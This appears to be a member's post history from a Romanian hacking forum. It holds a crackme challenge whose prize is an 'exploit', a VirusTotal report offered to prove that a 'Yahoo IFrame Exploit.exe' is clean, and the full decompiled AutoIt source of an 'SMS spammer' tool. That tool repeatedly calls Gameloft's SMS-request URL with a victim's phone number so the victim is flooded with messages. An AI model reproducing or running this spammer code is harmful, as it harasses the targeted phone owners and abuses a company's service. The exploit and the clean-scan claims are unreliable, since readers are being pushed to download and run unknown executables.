Jump to content

Mecanik2

Members
  • Posts

    11
  • Joined

  • Last visited

Posts posted by Mecanik2

  1. Salutare,am facut si eu un "mic" challenge pentru voi!

    De aici vom vedea,cine (sau cati) de pe acest forum sunt adevarati HACKERI!

    Spargeti acest EXE si aflati "username" si "password".

    Gasiti datele corecte,si vi se va deschide un Exploit nou nout de la HaDes [yahoo]

    Nu faceti smecherii de genul FAKE.

    Postati screenshotul reusitei aici.

    Linkul : GirlShare - Download CrackMe.EXE

    L.E: Daca doriti un hint ceva,strigati pe aici........

  2. Bah VIRUSATILOR! VOI NU VEDETI CA VOI SUNTETI AIA VIRUSATI?

    Uite dovada clara in ochii aia mari ai vostrii,pentru asta iau eu ban:

    1a5f09164710302.jpg

    File name:

    Yahoo IFrame Exploit.exe

    Submission date:

    2011-12-15 20:38:15 (UTC)

    Current status:

    finished

    Antivirus Version Last Update Result

    AhnLab-V3 2011.12.15.00 2011.12.15 -

    AntiVir 7.11.19.132 2011.12.15 -

    Antiy-AVL 2.0.3.7 2011.12.15 -

    Avast 6.0.1289.0 2011.12.15 -

    AVG 10.0.0.1190 2011.12.15 -

    BitDefender 7.2 2011.12.15 -

    ByteHero 1.0.0.1 2011.12.07 -

    CAT-QuickHeal 12.00 2011.12.14 -

    ClamAV 0.97.3.0 2011.12.15 -

    Commtouch 5.3.2.6 2011.12.15 -

    Comodo 15967 2011.12.15 -

    DrWeb 5.0.2.03300 2011.12.15 -

    Emsisoft 5.1.0.11 2011.12.15 -

    eSafe 7.0.17.0 2011.12.15 -

    eTrust-Vet 37.0.9626 2011.12.15 -

    F-Prot 4.6.5.141 2011.12.14 -

    F-Secure 9.0.16440.0 2011.12.15 -

    Fortinet 4.3.388.0 2011.12.15 -

    GData 22.308/22.579 2011.12.15 -

    Ikarus T3.1.1.109.0 2011.12.15 -

    Jiangmin 13.0.900 2011.12.15 -

    K7AntiVirus 9.119.5696 2011.12.15 -

    Kaspersky 9.0.0.837 2011.12.15 -

    McAfee 5.400.0.1158 2011.12.15 -

    McAfee-GW-Edition 2010.1E 2011.12.15 -

    Microsoft 1.7903 2011.12.15 -

    NOD32 6715 2011.12.15 -

    Norman 6.07.13 2011.12.15 -

    nProtect 2011-12-15.02 2011.12.15 -

    Panda 10.0.3.5 2011.12.15 -

    PCTools 8.0.0.5 2011.12.15 -

    Prevx 3.0 2011.12.15 -

    Rising 23.88.03.01 2011.12.15 -

    Sophos 4.72.0 2011.12.15 -

    SUPERAntiSpyware 4.40.0.1006 2011.12.15 -

    Symantec 20111.2.0.82 2011.12.15 -

    TheHacker 6.7.0.1.359 2011.12.15 -

    TrendMicro 9.500.0.1008 2011.12.15 -

    TrendMicro-HouseCall 9.500.0.1008 2011.12.15 -

    VBA32 3.12.16.4 2011.12.14 -

    VIPRE 11259 2011.12.15 -

    ViRobot 2011.12.15.4827 2011.12.15 -

    VirusBuster 14.1.118.0 2011.12.15 -

    Additional information

    MD5 : 7d6e8d06305308d511184ec8f32f3ddf

    SHA1 : aae1f1b4ad532b688ded57bf4f50ae45309c91d6

    SHA256: 01e55049a4547c1e46aea011bfccfb9c5ee93c69ad73b96adaab061f7257d0e5

    ssdeep: 768:D3itz2Hr0OvDlWcI5Y/mquJb2XPz05qvfavJUjO:DStqHr0WDlhnu12fKJV

    File size : 48128 bytes

    First seen: 2011-09-11 20:44:17

    Last seen : 2011-12-15 20:38:15

    TrID:

    Generic CIL Executable (.NET, Mono, etc.) (72.5%)

    Windows Screen Saver (12.9%)

    Win32 Executable Generic (8.4%)

    Win16/32 Executable Delphi generic (2.0%)

    Generic Win/DOS Executable (1.9%)

    sigcheck:

    publisher....: n/a

    copyright....: Copyright © 2011

    product......: Yahoo IFrame Exploit

    description..: Yahoo IFrame Exploit

    original name: Yahoo IFrame Exploit.exe

    internal name: Yahoo IFrame Exploit.exe

    file version.: 1.0.0.0

    comments.....: n/a

    signers......: -

    signing date.: -

    verified.....: Unsigned

    -----------------------------------------

    Da`van...

  3. Intelegeti. Vam dat sursa destul de clar. Daca GAMELOFT sau uitat peste loguri (peste sunt loguri),si au vazut ca se trimit mesaje in prostie,este si normal ca ori au scos linku,ori au restrictionat accesul;

    Asadar,programul trimite comanda,si raspunde "succes".

    Programul nu are setari care sa arate daca linkul mai exista sau nu!

    Deci pana la urma tot la PHP ajungem,asa ca am sa fac eu script pt toti membrii RST mocca!

    P.S Mecanik = gm_dizzy Banat pentru o prostie!

    • Downvote 1
  4. Ia lasa vrajeala,l-am decriptat este facut in AutoIT3

    AVETI AICI SURSA PROGRAMULUI MOCCA!


    #NoTrayIcon
    #Region ;**** Directives created by AutoIt3Wrapper_GUI ****
    #AutoIt3Wrapper_icon=ico\delete.ico
    #AutoIt3Wrapper_Compression=4
    #AutoIt3Wrapper_Res_Comment=Powered B.y Cyber | www.mortal-team.net
    #AutoIt3Wrapper_Res_Description=Powered B.y Cyber | www.mortal-team.net
    #AutoIt3Wrapper_Res_Fileversion=0.0.0.3
    #AutoIt3Wrapper_Res_Fileversion_AutoIncrement=p
    #AutoIt3Wrapper_Res_LegalCopyright=Powered B.y Cyber | www.mortal-team.net
    #AutoIt3Wrapper_Res_SaveSource=y
    #AutoIt3Wrapper_Res_Field=Powered B.y Cyber|www.mortal-team.net
    #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
    #include <ButtonConstants.au3>
    #include <EditConstants.au3>
    #include <GUIConstantsEx.au3>
    #include <StaticConstants.au3>
    #include <WindowsConstants.au3>
    #include <IE.au3>

    Global $nr_tel
    $Form1 = GUICreate("Spammer sms turbo * 3 By Cyber!", 305, 78, -1, -1, -1, BitOR($WS_EX_TOOLWINDOW,$WS_EX_TOPMOST,$WS_EX_WINDOWEDGE))
    GUISetBkColor(0x000000)
    $Group1 = GUICtrlCreateGroup("Settings", 4, 2, 297, 73)
    $Label1 = GUICtrlCreateLabel("Phone number:", 12, 18, 89, 17)
    GUICtrlSetFont(-1, 8, 800, 0, "MS Sans Serif")
    GUICtrlSetColor(-1, 0xFF0000)
    $Input1 = GUICtrlCreateInput("07", 104, 16, 185, 21, BitOR($ES_CENTER,$ES_AUTOHSCROLL,$ES_NUMBER), BitOR($WS_EX_CLIENTEDGE,$WS_EX_STATICEDGE))
    GUICtrlSetFont(-1, 8, 800, 0, "MS Sans Serif")
    GUICtrlSetBkColor(-1, 0xFF0000)
    $Label2 = GUICtrlCreateLabel("Sent:", 12, 48, 34, 17)
    GUICtrlSetFont(-1, 8, 800, 0, "MS Sans Serif")
    GUICtrlSetColor(-1, 0xFF0000)
    $Input2 = GUICtrlCreateInput("5", 50, 42, 81, 21, BitOR($ES_CENTER,$ES_AUTOHSCROLL,$ES_NUMBER), BitOR($WS_EX_CLIENTEDGE,$WS_EX_STATICEDGE))
    GUICtrlSetFont(-1, 8, 800, 0, "MS Sans Serif")
    GUICtrlSetBkColor(-1, 0xFF0000)
    $Button1 = GUICtrlCreateButton("Start!", 136, 40, 67, 25, $WS_GROUP, $WS_EX_STATICEDGE)
    GUICtrlSetFont(-1, 8, 800, 0, "MS Sans Serif")
    GUICtrlSetCursor (-1, 0)
    $Button2 = GUICtrlCreateButton("Stop!", 207, 40, 67, 25, $WS_GROUP, $WS_EX_STATICEDGE)
    GUICtrlSetFont(-1, 8, 800, 0, "MS Sans Serif")
    GUICtrlCreateGroup("", -99, -99, 1, 1)

    GUISetState(@SW_SHOW)

    While 1
    $nMsg = GUIGetMsg()
    Switch $nMsg
    Case $GUI_EVENT_CLOSE
    Exit
    Case $Button1
    gomsg()
    Case $Button2
    Exit
    EndSwitch
    WEnd

    Func gomsg()
    For $i = 1 To GUICtrlRead($Input2) Step 1
    $nr_tel = GUICtrlRead($Input1)
    $oIE = _IECreate ("http://www.gameloft.com/request-sms.php?wc=documents&step=1&phone="&$nr_tel&"&country=175&operator=329", 0,0,1)

    _IEQuit($oIE)


    Next
    MsgBox(64,"Info","Finish!")
    EndFunc

    Din cate se vede face apel la

    http://www.gameloft.com/request-sms.php?wc=documents&step=1&phone="&$nr_tel&"&country=175&operator=329"

    Iar functia e:

    Func gomsg()
    For $i = 1 To GUICtrlRead($Input2) Step 1
    $nr_tel = GUICtrlRead($Input1)
    $oIE = _IECreate

    Logic ca aia au loguri,si au scos linkul :))

    Have a nice day

    • Upvote 1
  5. Da asa este,dar se pare ca o gramada mare de copii care se cred "hackeri" nu stie sa faca diferenta dintre un virus si un program scris in VB care nu ruleaza daca nu are NTF4.

    Fratilor,eu in daca eram staff aici faceam in asa fel sa nu se poata inregistra orice copil BUT care nici macar nu stie cu ce se mananca Hackingul.

    P.S Multumesk de ban pentru un program CLEAN.

×
×
  • Create New...